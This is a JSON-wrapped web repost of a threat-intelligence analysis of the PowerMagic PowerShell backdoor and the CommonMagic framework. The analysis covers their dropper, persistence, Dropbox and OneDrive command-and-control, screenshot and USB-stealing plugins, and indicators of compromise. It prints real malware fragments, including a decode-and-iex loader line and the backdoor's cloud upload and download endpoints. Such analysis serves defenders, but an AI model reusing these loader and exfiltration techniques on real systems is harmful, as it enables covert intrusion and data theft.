data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">}<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-13\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-e\" data-gtm-vis-has-fired-11711842_122=\"1\">Try<\/span> <span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">{<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-14\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">System<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">Text<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">Encoding<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">:<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">:<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">ASCII<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-e\" data-gtm-vis-has-fired-11711842_122=\"1\">GetString<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">(<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">)<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">|<\/span><span class=\"crayon-r \" data-gtm-vis-has-fired-11711842_122=\"1\">iex<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-15\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">}<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-16\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-e\" data-gtm-vis-has-fired-11711842_122=\"1\">Catch<\/span> <span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">{<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">}<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-17\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-r \" data-gtm-vis-has-fired-11711842_122=\"1\">Start-Sleep<\/span> 3<span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-18\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-r \" data-gtm-vis-has-fired-11711842_122=\"1\">Remove-Item<\/span> <span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-Path<\/span> <span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$inst<\/span> <span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-Force<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>The next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named\u00a0config\u00a0and\u00a0manutil.vbs\u00a0to %APPDATA%\\WinEventCom, and creates a Task Scheduler job named\u00a0WindowsActiveXTaskTrigger, to execute the\u00a0wscript.exe%APPDATA%\\WinEventCom\\manutil.vbs\u00a0command every day.<\/p>\n<p id=\"the-powermagic-backdoor\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>The PowerMagic backdoor<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The script\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">manutil.vbs<\/strong>, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that we named\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic.<\/strong>\u00a0The main body of the backdoor is read from the file\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">%APPDATA%\\WinEventCom\\config<\/strong>\u00a0and decrypted with a simple XOR (key: 0x10).<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Snippet of PowerMagic\u2019s code containing the \u201cpowermagic\u201d string<\/strong><\/p>\n<table class=\"crayon-table\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<tbody data-gtm-vis-has-fired-11711842_122=\"1\">\n<tr class=\"crayon-row\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<td class=\"crayon-nums \" data-settings=\"show\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-nums-content\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144dedb152724255-1\" data-gtm-vis-has-fired-11711842_122=\"1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144dedb152724255-2\" data-gtm-vis-has-fired-11711842_122=\"1\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144dedb152724255-3\" data-gtm-vis-has-fired-11711842_122=\"1\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144dedb152724255-4\" data-gtm-vis-has-fired-11711842_122=\"1\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144dedb152724255-5\" data-gtm-vis-has-fired-11711842_122=\"1\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144dedb152724255-6\" data-gtm-vis-has-fired-11711842_122=\"1\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144dedb152724255-7\" data-gtm-vis-has-fired-11711842_122=\"1\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-pre\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div id=\"crayon-6447bb144dedb152724255-1\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$AppDir<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;powermagic&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-2\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$ClinetDir<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;client&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-3\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$ClinetTaskDir<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;task&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-4\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$ClinetResultDir<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;result&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-5\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$ClientToken<\/span>=<span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">redacted<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-6\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$dbx_up<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;https:\/\/content.dropboxapi.com\/2\/files\/upload&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144dedb152724255-7\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$dbx_down<\/span> = <span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8216;https:\/\/content.dropboxapi.com\/2\/files\/download&#8217;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">When started, the backdoor creates a mutex \u2013\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">WinEventCom<\/strong>. Then, it enters an infinite loop communicating with its C&amp;C server, receiving commands and uploading results in response. It uses OneDrive and Dropbox folders as transport, and OAuth refresh tokens as credentials.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Every minute the backdoor performs the following actions:<\/p>\n<ol data-gtm-vis-has-fired-11711842_122=\"1\">\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Modifies the heartbeat file located at \/$AppDir\/$ClientDir\/&lt;machine UID&gt; (the values of the $AppDir and $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the backdoor PID and a number incremented by one with each file modification.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Downloads commands that are stored as a file in the \/$AppDir\/$ClientTaskDir directory.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Executes every command as a PowerShell script.<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">Uploads the output of the executed PowerShell command to the cloud storage, placing it in the \/$AppDir\/$ClientResultDir\/&lt;victim machine UUID&gt;.&lt;timestamp&gt; file.<\/li>\n<\/ol>\n<p id=\"the-commonmagic-framework\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>The CommonMagic framework<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">As it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that we named CommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading us to believe that CommonMagic is deployed via PowerMagic.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The CommonMagic framework consists of several executable modules, all stored in the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">C:\\ProgramData\\CommonCommand<\/strong><strong data-gtm-vis-has-fired-11711842_122=\"1\">.\u00a0<\/strong>Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&amp;C server, encryption and decryption of the C&amp;C traffic and various malicious actions.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The diagram below illustrates the architecture of the framework.<\/p>\n<figure id=\"attachment_12229\" aria-describedby=\"caption-attachment-12229\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12229\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1.png\" alt=\"\" width=\"1024\" height=\"568\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1-300x166.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_09-1024x568-1-768x426.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-12229\" class=\"wp-caption-text\">Framework architecture<\/figcaption><\/figure>\n<p id=\"network-communication\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>Network communication<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The framework uses OneDrive remote folders as a transport. It utilizes\u00a0<a href=\"https:\/\/learn.microsoft.com\/en-us\/graph\/use-the-api\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">the Microsoft Graph API<\/a>\u00a0using an OAuth refresh token embedded into the module binary for authentication. The\u00a0<a href=\"https:\/\/rapidjson.org\/\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">RapidJSON library<\/a>\u00a0is used for parsing JSON objects returned by the Graph API.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">A dedicated heartbeat thread updates the remote file\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/S\/S.txt<\/strong>\u00a0every five minutes with the local timestamp of the victim.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Then, in separate threads, the network communication module downloads new executable modules from the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/M\u00a0<\/strong>and uploads the results of their execution to the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">&lt;victim ID&gt;\/R.<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library. By default, this library uses the seven-byte sequence \u201cRC5SIMP\u201d at the beginning of the encrypted sequence, but the developers of the backdoor changed it to \u201cHwo7X8p\u201d. Encryption is implemented in a separate process, communicating over the pipes named\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">\\\\.\\pipe\\PipeMd<\/strong>\u00a0and\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">\\\\.\\pipe\\PipeCrDtMd.<\/strong><\/p>\n<p id=\"plugins\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>Plugins<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">So far, we have discovered two plugins implementing the malicious business logic. They are located in the directory\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">C:\\ProgramData\\CommonCommand\\Other<\/strong>.<\/p>\n<ul data-gtm-vis-has-fired-11711842_122=\"1\">\n<li data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Screenshot (S.exe)<\/strong>\u00a0\u2013 takes screenshots every three seconds using the GDI API<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">USB (U.exe)<\/strong>\u00a0\u2013 collects the contents of the files with the following extensions from connected USB devices:\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">.doc, .docx. .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.<\/strong><\/li>\n<\/ul>\n<p id=\"to-be-continued\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>To be continued<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">So far, we have found no direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and our investigation continues. So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.<\/p>\n<p id=\"commonmagic-indicators-of-compromise\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong>CommonMagic indicators of compromise<\/strong><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Lure archives<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/0a95a985e6be0918fdb4bfabf0847b5a\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">0a95a985e6be0918fdb4bfabf0847b5a<\/a>\u00a0\u043d\u043e\u0432\u043e\u0435 \u043e\u0442\u043c\u0435\u043d\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0438\u043a 288.zip (new cancellation of resolution local election committee 288.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ecb7af5771f4fe36a3065dc4d5516d84\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ecb7af5771f4fe36a3065dc4d5516d84<\/a>\u00a0\u0432\u043d\u0435\u0441\u0435\u043d\u0438\u0435_\u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439_\u0432_\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435_\u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435_\u0430\u043a\u0442\u044b_\u0440\u0444.zip (making changes to several russian federation laws.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/765f45198cb8039079a28289eab761c5\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">765f45198cb8039079a28289eab761c5<\/a>\u00a0\u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d \u0440\u0431 (redacted) .zip (citizen of republic of belarus (redacted).zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ebaf3c6818bfc619ca2876abd6979f6d\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ebaf3c6818bfc619ca2876abd6979f6d<\/a>\u00a0\u0446\u0438\u043a 3638.zip (central election committee 3638.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1032986517836a8b1f87db954722a33f\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1032986517836a8b1f87db954722a33f<\/a>\u00a0\u0441\u0437 14-1519 \u043e\u0442 10.08.22.zip (memo 14-1519 dated 10.08.22.zip)<br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1de44e8da621cdeb62825d367693c75e\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1de44e8da621cdeb62825d367693c75e<\/a>\u00a0\u043f\u0440\u0438\u043a\u0430\u0437 \u043c\u0438\u043d\u0444\u0438\u043d\u0430 \u0434\u043d\u0440 \u2116 176.zip (dpr ministry of finance order #176.zip)<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic installer<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/fee3db5db8817e82b1af4cedafd2f346\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">fee3db5db8817e82b1af4cedafd2f346<\/a>\u00a0attachment.msi<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic dropper<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/bec44b3194c78f6e858b1768c071c5db\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">bec44b3194c78f6e858b1768c071c5db<\/a>\u00a0service_pack.dat<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic loader<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/8c2f5e7432f1e6ad22002991772d589b\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">8c2f5e7432f1e6ad22002991772d589b<\/a>\u00a0manutil.vbs<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">PowerMagic backdoor<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/1fe3a2502e330432f3cf37ca7acbffac\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">1fe3a2502e330432f3cf37ca7acbffac<\/a><\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic loader<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/ce8d77af445e3a7c7e56a6ea53af8c0d\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">ce8d77af445e3a7c7e56a6ea53af8c0d<\/a>\u00a0All.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic cryptography module<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/9e19fe5c3cf3e81f347dd78cf3c2e0c2\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">9e19fe5c3cf3e81f347dd78cf3c2e0c2<\/a>\u00a0Clean.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">CommonMagic network communication module<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/><a href=\"https:\/\/opentip.kaspersky.com\/7c0e5627fd25c40374bc22035d3fadd8\/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">7c0e5627fd25c40374bc22035d3fadd8<\/a>\u00a0Overall.exe<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Distribution servers<\/strong><br data-gtm-vis-has-fired-11711842_122=\"1\" \/>webservice-srv[.]online<br data-gtm-vis-has-fired-11711842_122=\"1\" \/>webservice-srv1[.]online<br data-gtm-vis-has-fired-11711842_122=\"1\" \/>185.166.217[.]184<\/p>\n<p><strong>Fuente:<\/strong> <a href=\"https:\/\/securelist.com\/bad-magic-apt\/109087\/\" target=\"_blank\" rel=\"noopener\"><em>https:\/\/securelist.com<\/em><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Desde el comienzo del conflicto ruso-ucraniano, los investigadores de Kaspersky y la comunidad internacional en general han identificado una cantidad significativa de ciberataques ejecutados en&hellip; <\/p>\n","protected":false},"author":1,"featured_media":12222,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[23,28],"tags":[],"_links":{"self":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221"}],"collection":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12221"}],"version-history":[{"count":1,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221\/revisions"}],"predecessor-version":[{"id":12230,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/posts\/12221\/revisions\/12230"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=\/wp\/v2\/media\/12222"}],"wp:attachment":[{"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fie.undef.edu.ar\/ceptm\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}